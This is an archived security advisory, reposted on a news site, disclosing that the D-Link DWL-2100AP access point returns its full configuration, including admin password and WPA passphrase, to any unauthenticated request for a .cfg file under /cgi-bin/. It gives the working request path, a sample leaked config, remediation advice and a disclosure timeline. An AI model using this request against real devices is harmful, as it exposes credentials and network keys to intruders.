Advertisement
Home arrow ITsec Advisories arrow D-Link DWL-2100AP Exposure of Configuration Files
Sunday, 07 September 2008
  
 
Last week attacks
O.S.  Defs.  %
Linux  10305  64.59%
Win 2003  4064  25.47%
Win 2000  1034  6.48%
FreeBSD  357  2.24%
SolarisSunOS  107  0.67%
Other  88  0.55%

Total attacks: 15955 of which 4929 single ip and 11026 mass defacements

Main Menu
Home
Digital Warfare
Geopolitics
ITsec News
ITsec Advisories
Test Drive
360°
Digital Attacks Archive
Zone-H events
Publications
Zone-H Friends/Partners
Contact Us
Search
Download Area
Zone-H forum
About this website
Login Form





Lost Password?
No account yet? Register
Visitors' Map
D-Link DWL-2100AP Exposure of Configuration Files PDF Print E-mail
User Rating: / 22
PoorBest 
Thursday, 08 June 2006

ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)


PRIORITY: HIGH

 

II - INTRODUCTION:
----------------------

D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):

D-Link, the industry pioneer in wireless networking, introduces a performance
breakthrough in wireless connectivity – D-Link AirPlus Xtreme GTM series of
high-speed devices now capable of delivering transfer rates up to 15x faster
than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme
G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access
points.

D-Link DWL-2100ap is one of the most popular Access Point in the world.


III - DESCRIPTION:
------------------

Intruders Tiger Team Security identified during an intrusion project (Pen-Test) an
unknown vulnerability in the Access Point D-Link DWL-2100ap, that allows an attacker
to read device's configuration, without authentication with web server.

Extremely sensible informations are avaible in the configuration of the Access Point
D-Link DWL-2100ap, for example:

- User and password used to manage the device.
- Password used in WEP and WPA.
- SSID, IP, subnet mask, MAC Address filters, etc.


IV - ANALISYS:
---------------

Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).

Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).

However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will
return all the device configuration.


For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

We would have a result equivalent to the following:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

D-Link DWL-2100ap Access Point does not allow disable the Web server, not even has options to
filter ports.

We remember that the D-Link DWL-2100ap Access Point comes configured with default user /
password (user:admin and no password).

V. DETECTION:
-------------

Intruders Tiger Team Security confirmed the existence of this vulnerability in all firmwares
tested, also the last version 2.10na.

Possibly other(s) D-Link Access Point model(s) can be vulnerable also.


VI. SUGESTION:
--------------


D-Link company:


1 - Use strong cookies to guarantee that only authorized users will get access to configuration.

2 - Store sensible configurations like password(s) using hash(s).

3 - Allow create firewall politics and rules to filters port(s) and IP(s).

4 - Request to the user change the default user/password on the first logon, and not allow
change the password to the last one used.

5 - Use HTTP with SSL (HTTPS).

6 - Contracts specialized companies in Pen-Test and security audit, aiming homologate the
security of D-Link products.


D-Link customers:


1 - Upgrade the firmware of D-Link DWL-2100ap Access Point.
Direct link to download is http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp


VII - CHRONOLOGY:
-----------------

11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team Contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last try of contact.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team Contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responsed.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - published advisory.


VIII - CREDITS:
---------------

Wendel Guglielmetti Henrique and Intruders Tiger Team Security had discovered this vulnerability.

Gratefulness to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme, João
Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open Source).

Visit our website:

http://www.intruders.com.br/
http://www.intruders.org.br/

Original Advisory:
http://www.intruders.org.br/adv0206en.html  

 


Comments Index (Total Messages: 1)
by_shadow Written by Guest on 2006-06-08 20:42:48

Powered by a Zone-H(ified) version of AkoComment 3.0!


DISCLAIMER: Forum postings are the opinion of the posting author alone, and should not be taken as the opinion of Zone-h. The   author is entirely and solely responsible for all content that he/she uploads, posts, or otherwise transmits via the website. Zone-h is not responsible for such content. However, Zone-h shall have the right, but not the obligation, to delete, move, or edit any content that violates this agreement or is otherwise objectionable as determined by Zone-h in its sole discretion and without notice.
 
< Prev   Next >
[ Back ]
 
Top!
© 2008 Zone-H.org
Joomla! is Free Software released under the GNU/GPL License.
 Top!